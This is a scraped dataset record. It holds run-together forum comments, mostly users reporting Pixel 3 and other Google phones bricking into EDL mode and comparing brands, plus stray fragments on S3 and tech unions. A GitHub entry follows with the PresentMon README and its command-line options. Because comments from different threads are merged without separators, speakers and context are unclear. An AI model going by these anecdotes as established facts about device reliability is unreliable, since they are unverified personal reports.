compensation, or accepting an out-of-court settlement. I'm talking full-strength, possibly precedent-setting fulfillment of that promise in federal court.I would so contribute to a legal fund for that, especially with the stipulation that my money must be returned if an out-of-court settlement were reached.Only viewable signed in...Whoever wrote that blog post has probably long since moved on to other things....I'm convinced that any project named Titan will fail to ship (or fail immediately after shipping, as in the most famous instance). Apple's car project was Titan, Facebook's Gmail killer was Project Titan, and I think Activision Blizzard had a Titan. Google has this, but I don't even think it's their first Titan to not ship; I'm blanking on the other. (Edit: Google's defunct internet drone project was Titan)- My phone is bricked...- Please go to Settings...that was hilarious :)Huhn. My wife's Pixel 3 broke just days before the 5a was released (this happened just a few weeks ago). Her LTE radio seemed to be having problems. It wouldn't connect to the cell tower, even after a factory reset. Sometimes, removing the SIM card and reinserting it would cause the phone to magically start working, but it would quickly lose its connection again. We tried different SIMs, and finally it was totally dead and she used my old iPhone 6 for a few days while we waited for the 5a to arrive.I will buy a Google-made phone for development purposes since they get updates fast, but as far as everyday use? Never again. My Nexus 6P bricked just because I forgot to charge it and it went down to 0. And when I researched the problem online, it turned out to be a known issue. That made me furious. It made me move over to a Samsung Galaxy, which I love. I can't believe this is still an issue with them.If this were about iPhones it would have 999 comments and 10 times as many upvotes, but any other brand and people are like oh no, anyway.Crap.I'm now considering buying a new Pixel phone - I need to switch from iPhone to Android for certain reasons, and I hate the pre-installed crap on Samsung phones. (Samsung Internet? Really?)But I also don't want to deal with HW issues, and my family never had any HW problems with Samsung... so I guess Samsung it is?I recently had a Pixel 2 die on me in a similar-sounding way. It was working perfectly fine, and then suddenly it wouldn't turn on and wouldn't take a charge. Tested with one of those USB tester things, and it showed 0 amps being drawn.I liked this exchange:\n\n Case ID [9-2313000031523]\n Me: I am also recording this conversation\n Support: We do not allow you to record\n Me: So you can record, but I can't?\n Support: That is correct.\n\nI'm pretty sure that, in the US, even in \"2 party consent\" states, once both parties are aware the call is / may be recorded, you're on solid ground. As such, if the Google end says \"this call may be recorded\", you can record. (IANAL, etc... just my understanding)Unfortunately there is a sign-in wall to this content.Phones are stuck in EDL mode with no way to recover, due to Google not releasing the signed firehose files.https://issuetracker.google.com/issues/192008282https://www.google.de/search?q=pixel+3+brick&tbm=nwsI am not affected (yet). If anyone from Germany is interested in figuring out what the issue is and can risk losing their data, feel free to ping me on Libera IRC. I have the ability to desolder and dump the UFS memory to start some investigation.I can't believe they inflict Buganizer on the innocent public.I've had similar issues with all the Pixel phones I've had too :(I do like the fact that nothing fancy gets installed on the phone (unlike Samsung and the rest), but my Samsung Note 9 has been working for 2-3 years with no issues! (yes, I don't like the crap that they add, but I got used to it... by ignoring it)Huh, my Pixel 3 XL also just died in a very similar way: the battery was starting to lose charge faster than expected, and a few nights ago it died again and then wouldn't power on. It was taking a charge: I plugged it into a powerbank with a wattage meter, and it was pulling just 5W over USB-C. (The powerbank supports full PD.) This is probably the wrong spot to report it, sadly, so it's probably been muted; it seems like a hardware issue, not an issue with Android itself.I really loved my Nexus 5 phone from Google until it got stuck in a bootloop and wouldn't charge. 
It was a couple weeks out of warranty, but they were nice enough to send me another one (with a charge hold) that almost immediately became a brick as well, with the same issue, and that one they would not replace.It kind of sucks to see that this is still an ongoing issue on their newer and (much) more expensive phones. I've already sworn off getting another device from Google, and this just reinforces that point. Samsung's hardware (with uh, one Note-able exception) has been solid, and while it didn't get the same updates and of course had all the nonsense that Samsung added on top of the base Android experience, it was much better than any other Android device I've owned.That said, the iPhone 4s I owned and the iPhone Xs Max I currently own are the two best phones I've owned, and it's really not close. Of course it's frustrating dealing with the limitations of the OS, and man would I love to sideload some of the great applications they have on Android, but the reliability and support are just unparalleled, not to mention iOS just kind of gets a lot of basic things right, which makes it a much more enjoyable experience without tinkering.Pixel 3 is EOL anyway as of October 2021: no more software updates and no more security patches. Makes sense the hardware is EOL as well.Meanwhile, an iPhone SE from 2016 can upgrade to the latest iOS. It just works.Especially with the Pixel lineup, there is a historical quality control issue with Google's phones that I'm worried hasn't been solved yet. I owned:- Pixel 3: In the past few months, the volume buttons and power button gradually stopped working. The USB port works for charging, but when connected to a computer, the port connects and disconnects in an infinite loop. The Bluetooth connection with my car always skips/stutters during Maps usage, even though iPhones and other Android devices work fine.- Pixel: Camera stopped working- Nexus 5X: Infinite boot loop issue; contacted Google and replaced it under warranty- Nexus 4: No hardware issues- Nexus One: No hardware issuesThe Nexus phones were less problematic. I suspect it's because they were co-designed/manufactured by LG.As time goes on, I use my phone less, not more, and I haven't dropped Pixel phones, unlike the Nexus ones.I'm wary of purchasing the Pixel 3a, 4, or 5, since I don't want to be burned a 3rd time by specifically Google-designed phones. I think it would be best to avoid Android OS updates as much as possible as well.I'm looking for my next smartphone to be modular, and I'm heavily considering a Linux phone that's easier to DIY repair.The Advanced Hardware Support Team is currently requesting only phones that are in EDL mode. 
While the issue tracker has become a graveyard for phones, the particular focus of the engineers is Pixel 3/3 XL phones entering EDL mode after an OTA update.If you have had this problem, please star the issue ticket and add a comment about your circumstances.Some technical explanation of EDL mode is a couple pages into the xda-dev forum thread:\nhttps://forum.xda-developers.com/t/fix-pixel-3-qusb_bulk_cid...A reddit post that lists just about all the reddit posts at the time on this topic:\nhttps://www.reddit.com/r/GooglePixel/comments/ongj1j/a_remin...Some additional news stories on this:https://9to5google.com/2021/09/01/some-pixel-3-devices-are-g...https://www.androidpolice.com/phones-devices/google-phones-d...https://www.phonearena.com/news/pixel-3-and-pixel-3-xl-model...https://www.extremetech.com/mobile/326636-something-is-brick...https://slashdot.org/story/21/09/03/019201/pixel-3-and-3-xl-...I have no idea what EDL mode is, but some googling led me to an open source utility [1] called \"Sahara.\" I wonder if you could use it for recovery?[1] https://github.com/openpst/saharaGoogling EDL mode, apparently one way to enable it is to \"short the test points on your device's mainboard.\" Maybe Pixel 3s are getting these test points bridged by something inside the case, possibly due to e.g. thermal battery expansion pushing something against the mainboard?Just had a Pixel 3a brick out of nowhere a few weeks ago after the battery died.My Pixel 3A bricked suddenly as well. It's now just collecting dust in the cabinet, very disappointing. Meanwhile, my iPhone 6S still works, but with a deteriorated battery.That mode indicates that the boot ROM failed to verify the signature on the bootloader. Generally this means that for some reason your bootloader got corrupted. The way to restore this is a special Qualcomm tool, but you also need a properly formatted and signed package to flash using the tool, and I doubt that Google would give it to you.How did it get corrupted? FTL issue in an aging eMMC? Bug in the Linux kernel block device driver? Malicious code? Sheer dumb misfortune? Who knows...good stuff. Thanks for sharing.Thanks!Thanks for sharing, S3 is still one of the most fascinating technologies that I admire.Clickable links:Google Union -> https://alphabetworkersunion.org/CODE-CWA -> https://www.code-cwa.org/Problems with tech workers' working conditions are not unknown in the USA. For instance, workers can face layoffs, many people are coerced into working over 8 hours, and there are various other harmful practices. The Kickstarter union managed to limit the company's layoff policy by securing gains such as 4 months' pay for laid-off workers. It also stopped Kickstarter's attempts to censor anti-racist content, such as the comic series \"Always Punch Nazis\". Meanwhile, writers for app developer Voltage Entertainment increased their wages by 78% through a strike.If a workplace's conditions don't make the workers happy, for whatever reason, virtually anything can be changed by unions. They could make a tremendous impact on tech workers' lives by changing many aspects of work-life balance, which is certainly not ideal right now. There's no reason your work at your company shouldn't feel more like the enjoyable programming you do on personal projects you're devoted to. 
I will answer people's questions in the comments.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "GameTechDev/PresentMon", "link": "https://github.com/GameTechDev/PresentMon", "tags": ["tool"], "stars": 633, "description": "Tool for collection and processing of ETW events related to frame presentation on Windows.", "lang": "C++", "repo_lang": "", "readme": "[![](https://img.shields.io/github/license/GameTechDev/PresentMon)]()\n[![](https://img.shields.io/github/v/release/GameTechDev/PresentMon)](https://github.com/GameTechDev/PresentMon/releases/latest)\n[![](https://img.shields.io/github/commits-since/GameTechDev/PresentMon/latest/main)]()\n[![](https://img.shields.io/github/issues/GameTechDev/PresentMon)]()\n[![](https://img.shields.io/github/last-commit/GameTechDev/PresentMon)]()\n\n# PresentMon\n\nPresentMon is a tool to capture and analyze [ETW](https://msdn.microsoft.com/en-us/library/windows/desktop/bb968803%28v=vs.85%29.aspx?f=255&MSPPError=-2147217396) events related to swap chain presentation on Windows. It can be used to trace key performance metrics for graphics applications (e.g., CPU and Display frame durations and latencies) and works across different graphics APIs, different hardware configurations, and for both desktop and UWP applications.\n\nWhile PresentMon itself is focused on lightweight collection and analysis, there are several other programs that build on its functionality and/or help visualize the resulting data. For example, see\n\n- [CapFrameX](https://github.com/DevTechProfile/CapFrameX)\n- [FrameView](https://www.nvidia.com/en-us/geforce/technologies/frameview/)\n- [OCAT](https://github.com/GPUOpen-Tools/OCAT)\n- [PIX](https://devblogs.microsoft.com/pix/download/) (used as part of its [system monitor UI](https://devblogs.microsoft.com/pix/system-monitor/))\n\n## License\n\nCopyright (C) 2017-2022 Intel Corporation\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n## Releases\n\nBinaries for main release versions of PresentMon are provided on GitHub:\n\n- [Latest release](https://github.com/GameTechDev/PresentMon/releases/latest)\n- [List of all releases](https://github.com/GameTechDev/PresentMon/releases)\n\nSee [CONTRIBUTING](https://github.com/GameTechDev/PresentMon/blob/main/CONTRIBUTING.md) for information on how to request features, report issues, or contribute code changes.\n\n## Command line options\n\n| Capture Target Options | |\n| ---------------------- | --- |\n| `-captureall` | Record all processes (default). |\n| `-process_name name` | Record only processes with the provided exe name. This argument can be repeated to capture multiple processes. |\n| `-exclude name` | Don't record processes with the provided exe name. This argument can be repeated to exclude multiple processes. |\n| `-process_id id` | Record only the process specified by ID. |\n| `-etl_file path` | Consume events from an ETW log file instead of running processes. |\n\n| Output Options | |\n| ------------------- | --- |\n| `-output_file path` | Write CSV output to the provided path. |\n| `-output_stdout` | Write CSV output to STDOUT. |\n| `-multi_csv` | Create a separate CSV file for each captured process. |\n| `-no_csv` | Do not create any output file. |\n| `-no_top` | Don't display active swap chains in the console. |\n| `-qpc_time` | Output present time as a performance counter value. |\n| `-qpc_time_s` | Output present time as a performance counter value converted to seconds. |\n\n| Recording Options | |\n| ------------------- | --- |\n| `-hotkey key` | Use provided key to start and stop recording, writing to a unique CSV file each time. 'key' is of the form MODIFIER+KEY, e.g., \"alt+shift+f11\". |\n| `-delay seconds` | Wait for provided time before starting to record. If using -hotkey, the delay occurs each time recording is started. |\n| `-timed seconds` | Stop recording after the provided amount of time. |\n| `-exclude_dropped` | Exclude dropped presents from the CSV output. |\n| `-scroll_indicator` | Enable scroll lock while recording. |\n| `-no_track_display` | Disable tracking through GPU and display. |\n| `-track_debug` | Adds additional data to output not relevant to normal usage. |\n\n| Execution Options | |\n| ------------------------- | --- |\n| `-session_name name` | Use the provided name to start a new realtime ETW session, instead of the default \"PresentMon\". This can be used to start multiple realtime captures at the same time (using distinct, case-insensitive names). A realtime PresentMon capture cannot start if there are any existing sessions with the same name. |\n| `-stop_existing_session` | If a trace session with the same name is already running, stop the existing session (to allow this one to proceed). |\n| `-terminate_existing` | Terminate any existing PresentMon realtime trace sessions, then exit. Use with `-session_name` to target particular sessions. |\n| `-restart_as_admin` | If not running with elevated privilege, restart and request to be run as administrator. (See discussion above.) |\n| `-terminate_on_proc_exit` | Terminate PresentMon when all the target processes have exited. |\n| `-terminate_after_timed` | When using `-timed`, terminate PresentMon after the timed capture completes. |\n\n| Beta Options | |\n| ---------------------- | --- |\n| `-track_mixed_reality` | Capture Windows Mixed Reality data to a CSV file with \"_WMR\" suffix. |\n
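\nAs a concrete usage example, the invocation below records a single process for a fixed time and then exits. The process name and output path are placeholders (and the exact binary name depends on the release you downloaded), but every flag comes from the tables above:\n\n```shell\n# Capture 60 seconds of presents from game.exe, write them to a CSV, then exit.\nPresentMon.exe -process_name game.exe -timed 60 -terminate_after_timed -output_file game_presents.csv\n```\n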
## Comma-separated value (CSV) file output\n\n### CSV file names\n\nBy default, PresentMon creates a CSV file named \"PresentMon-\\